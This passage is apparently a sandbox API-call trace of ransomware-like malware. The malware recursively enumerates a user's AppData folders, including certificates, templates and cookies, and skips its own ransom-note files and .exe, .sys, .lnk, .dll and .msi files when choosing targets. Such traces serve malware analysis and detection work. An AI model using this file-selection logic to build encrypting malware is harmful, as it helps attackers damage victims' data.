lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0083.621] FindClose (in: hFindFile=0x72a920 | out: hFindFile=0x72a920) returned 1 [0083.621] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CTLs", cAlternateFileName="")) returned 1 [0083.621] lstrcmpW (lpString1="CTLs", lpString2=".") returned 1 [0083.621] lstrcmpW (lpString1="CTLs", lpString2="..") returned 1 [0083.621] lstrlenW (lpString="CTLs") returned 4 [0083.621] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="CTLs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs" [0083.621] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\" [0083.621] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\") returned 83 [0083.621] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a920 [0083.623] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.623] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.626] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.626] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.626] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0083.626] FindClose (in: hFindFile=0x72a920 | out: hFindFile=0x72a920) returned 1 [0083.626] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0083.626] FindClose (in: hFindFile=0x77c988 | out: hFindFile=0x77c988) returned 1 [0083.626] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0083.626] FindClose (in: hFindFile=0x708d18 | out: hFindFile=0x708d18) returned 1 [0083.626] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31d42f10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x2795d470, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x2795d470, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0083.627] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0083.627] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0083.627] lstrlenW (lpString="Templates") returned 9 [0083.627] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Templates" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates" [0083.627] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\" [0083.627] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\") returned 66 [0083.627] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x708d18 [0083.801] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.801] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31d42f10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x2795d470, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x2795d470, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.803] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.803] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.803] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5db2c650, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x5db2c650, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x5db78910, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x509b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Normal.dotm", cAlternateFileName="NORMAL~1.DOT")) returned 1 [0083.803] lstrcmpW (lpString1="Normal.dotm", lpString2=".") returned 1 [0083.803] lstrcmpW (lpString1="Normal.dotm", lpString2="..") returned 1 [0083.803] lstrcmpiW (lpString1="Normal.dotm", lpString2="ReadMe_Decryptor.txt") returned -1 [0083.803] lstrcmpiW (lpString1="Normal.dotm", lpString2="Decryptor_Info.hta") returned 1 [0083.803] PathFindExtensionW (pszPath="Normal.dotm") returned=".dotm" [0083.803] lstrcmpiW (lpString1=".dotm", lpString2=".exe") returned -1 [0083.803] lstrcmpiW (lpString1=".dotm", lpString2=".sys") returned -1 [0083.803] lstrcmpiW (lpString1=".dotm", lpString2=".lnk") returned -1 [0083.804] lstrcmpiW (lpString1=".dotm", lpString2=".dll") returned 1 [0083.804] lstrcmpiW (lpString1=".dotm", lpString2=".msi") returned -1 [0083.804] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0083.804] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x77cf48 [0083.804] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0083.804] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77d028 [0083.804] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0083.804] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5db2c650, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x5db2c650, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x5db78910, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x509b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Normal.dotm", cAlternateFileName="NORMAL~1.DOT")) returned 0 [0083.804] FindClose (in: hFindFile=0x708d18 | out: hFindFile=0x708d18) returned 1 [0083.805] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbab2410, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xbab2410, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xbab2410, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UProof", cAlternateFileName="")) returned 1 [0083.805] lstrcmpW (lpString1="UProof", lpString2=".") returned 1 [0083.805] lstrcmpW (lpString1="UProof", lpString2="..") returned 1 [0083.805] lstrlenW (lpString="UProof") returned 6 [0083.805] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="UProof" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof" [0083.805] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\" [0083.805] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\") returned 63 [0083.805] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x708d18 [0084.060] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.060] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbab2410, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xbab2410, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xbab2410, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.061] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.062] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.062] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbab2410, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xbab2410, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xbab2410, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x0, dwReserved1=0x0, cFileName="CUSTOM.DIC", cAlternateFileName="")) returned 1 [0084.062] lstrcmpW (lpString1="CUSTOM.DIC", lpString2=".") returned 1 [0084.062] lstrcmpW (lpString1="CUSTOM.DIC", lpString2="..") returned 1 [0084.062] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.062] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="Decryptor_Info.hta") returned -1 [0084.062] PathFindExtensionW (pszPath="CUSTOM.DIC") returned=".DIC" [0084.062] lstrcmpiW (lpString1=".DIC", lpString2=".exe") returned -1 [0084.062] lstrcmpiW (lpString1=".DIC", lpString2=".sys") returned -1 [0084.062] lstrcmpiW (lpString1=".DIC", lpString2=".lnk") returned -1 [0084.062] lstrcmpiW (lpString1=".DIC", lpString2=".dll") returned -1 [0084.062] lstrcmpiW (lpString1=".DIC", lpString2=".msi") returned -1 [0084.062] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x72a920 [0084.062] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x77cf48 [0084.062] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0084.062] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77d0d0 [0084.063] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.063] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbab2410, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xbab2410, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xbab2410, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x0, dwReserved1=0x0, cFileName="CUSTOM.DIC", cAlternateFileName="")) returned 0 [0084.063] FindClose (in: hFindFile=0x708d18 | out: hFindFile=0x708d18) returned 1 [0084.063] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0084.063] lstrcmpW (lpString1="Windows", lpString2=".") returned 1 [0084.063] lstrcmpW (lpString1="Windows", lpString2="..") returned 1 [0084.063] lstrlenW (lpString="Windows") returned 7 [0084.063] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Windows" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows" [0084.063] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\" [0084.063] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\") returned 64 [0084.063] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x708d18 [0084.064] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.064] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.066] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.066] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.066] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2c7870d0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2c7870d0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0084.066] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1 [0084.066] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1 [0084.066] lstrlenW (lpString="Cookies") returned 7 [0084.066] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Cookies" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies" [0084.066] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" [0084.066] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 72 [0084.066] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77c988 [0084.067] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.067] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2c7870d0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2c7870d0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.069] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.069] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.069] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1c3625f0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1c3625f0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1c3625f0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x53, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@adobe[1].txt", cAlternateFileName="5P5NRG~1.TXT")) returned 1 [0084.069] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@adobe[1].txt", lpString2=".") returned 1 [0084.069] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@adobe[1].txt", lpString2="..") returned 1 [0084.069] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[1].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.069] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[1].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.069] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@adobe[1].txt") returned=".txt" [0084.069] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.069] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.069] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.069] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.069] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.069] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.069] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x77d178 [0084.069] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.070] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77d270 [0084.070] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.070] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1d72bcd0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1e6a4bd0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1e6a4bd0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x227, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@adobe[3].txt", cAlternateFileName="5P0100~1.TXT")) returned 1 [0084.070] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@adobe[3].txt", lpString2=".") returned 1 [0084.070] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@adobe[3].txt", lpString2="..") returned 1 [0084.070] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[3].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.070] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[3].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.070] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@adobe[3].txt") returned=".txt" [0084.070] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.070] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.070] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.070] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.070] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.070] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.070] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x77d178 [0084.070] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.070] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77d358 [0084.070] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.070] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1d8f4d50, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1e658910, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1e658910, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0xf1, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@demdex[1].txt", cAlternateFileName="5PFFE8~1.TXT")) returned 1 [0084.070] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@demdex[1].txt", lpString2=".") returned 1 [0084.070] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@demdex[1].txt", lpString2="..") returned 1 [0084.070] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@demdex[1].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.071] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@demdex[1].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.071] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@demdex[1].txt") returned=".txt" [0084.071] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.071] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.071] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.071] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.071] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.071] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.071] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x77d178 [0084.071] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.071] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77d440 [0084.071] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.072] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: 